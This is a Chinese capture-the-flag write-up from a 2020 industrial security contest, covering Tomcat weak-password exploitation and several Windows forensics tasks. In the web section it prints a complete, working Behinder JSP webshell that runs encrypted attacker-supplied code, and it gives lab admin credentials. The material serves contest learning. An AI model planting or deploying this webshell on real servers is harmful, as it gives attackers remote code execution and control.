2020工业安全技能大赛——应急&电力专场部分WriteUp

原文:

Pdsdt’s Blog

平台登陆

需要我们连接VPN才能进入内网,登陆用户名和密码需要在平台进行申请,用的接入设备是深信服的软件,总体连接还是比较稳定的

2020工业安全技能大赛——应急&电力专场部分WriteUp_第1张图片

传输模式改为TCP比较稳定,主办方提供了具体的网段10.10.1.X,我们可以利用工具进行IP和服务探测,这里我使用的Advance_IP_Scanner

2020工业安全技能大赛——应急&电力专场部分WriteUp_第2张图片

电力专场

互联网大区题目一

扫描内网发现10.10.1.55的靶机开启WEB服务

2020工业安全技能大赛——应急&电力专场部分WriteUp_第3张图片

访问一下发现是Jsp搭建的博客,懒得手动测试了,直接上了扫描器

2020工业安全技能大赛——应急&电力专场部分WriteUp_第4张图片

发现了存在弱口令登陆

2020工业安全技能大赛——应急&电力专场部分WriteUp_第5张图片

在manager/html目录下,存在文件上传的点,我们可以构造我们的WEBSHELL压缩成WAR包上传,之后tomcat会服务会自动解包并将我们的WEBSHELL解析

2020工业安全技能大赛——应急&电力专场部分WriteUp_第6张图片

访问发现有其他人上马的痕迹,省时间直接骑别人的了

2020工业安全技能大赛——应急&电力专场部分WriteUp_第7张图片

发现在ROOT目录下存在f1ag.txt,直接下载查看即可获取flag

2020工业安全技能大赛——应急&电力专场部分WriteUp_第8张图片

互联网大区题目二

与上一道题目是一个环境,不过提示我们在WEB环境仍然存在一个flag,为了方便期间上传我们的冰蝎马进行链接

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

后来找了WEB源码也没找到,想到了去数据库查找,先把源码都给Down了下来,找一下数据库的配置文件

2020工业安全技能大赛——应急&电力专场部分WriteUp_第9张图片

使用冰蝎进行数据库连接,还是没有找到flag,之后找了后台登陆的用户名和密码

username= admin
md5(password)= ee955f62cb93483a635817b9f263439e # cmd5解出来的密码和数据库连接密码一样shenmiliu

登陆后台还是没有发现flag,想问问其他师傅们这个题目的flag到底是什么东西

应急专场

这个题目需要我们登陆远程桌面进行获取,远程桌面是WIN7的系统,想到了用户名应该为Administrator,利用主办方给我们提供的主机密码成功登陆

2020工业安全技能大赛——应急&电力专场部分WriteUp_第10张图片

不过顺利都是暂时的,后面我还遇到了,密码被修改、协议不正确、服务被关闭、主机IP变化等问题,等到六点之后内网的服务才趋于稳定…

解勒索病毒

桌面给了一个flag.txt.vlojw的文件,我们需要解密一下这个文件,在主机里进行信息收集,可以在admin的桌面下找到VLOJW-DECRYPT.txt,打开后发现勒索病毒为GANDCRAB V5.1
通过查阅资料可以知道该病毒已经有了解密软件

https://www.52pojie.cn/forum.php?mod=viewthread&tid=874030&highlight=GANDCRAB

直接使用软件进行扫描修复即可

2020工业安全技能大赛——应急&电力专场部分WriteUp_第11张图片

要注意的是,软件需要很长的时间,等着就完事了,解密成功后,就会在桌面下出现flag.txt

2020工业安全技能大赛——应急&电力专场部分WriteUp_第12张图片

病毒分析3

分析从远程获取到的文件,分析17-010补丁文件

2020工业安全技能大赛——应急&电力专场部分WriteUp_第13张图片

从远程dump部分文件下来。
题目寻找为MSF生成的马的ip,这里直接去运行文件,抓包分析即可。
运行17-010补丁并且抓包

2020工业安全技能大赛——应急&电力专场部分WriteUp_第14张图片

rdp攻击日志分析

参考文章:

https://blog.csdn.net/m0_37552052/article/details/82894963

事件管理器中找到TerminalServices-RemoteConnectionManager
选择日志进程号1149找ip

2020工业安全技能大赛——应急&电力专场部分WriteUp_第15张图片

浏览器取证

仍然是注册表里找信息

2020工业安全技能大赛——应急&电力专场部分WriteUp_第16张图片

这几个题目主要都是考察注册表的熟悉程度

内存取证分析

全场最离谱的题目,没有之一,给了一个加密的RAR让我们破解,队友有尝试爆破的,后来七点多的时候,一个队友试了一下主办方提供的远程桌面登陆的密码,结果打开了…

image.png-3.5kB

2020工业安全技能大赛——应急&电力专场部分WriteUp_第17张图片

赛后

希望下两场的环境能够稳定一些,能够多一点赛事体验感


你可能感兴趣的:(信息安全,安全)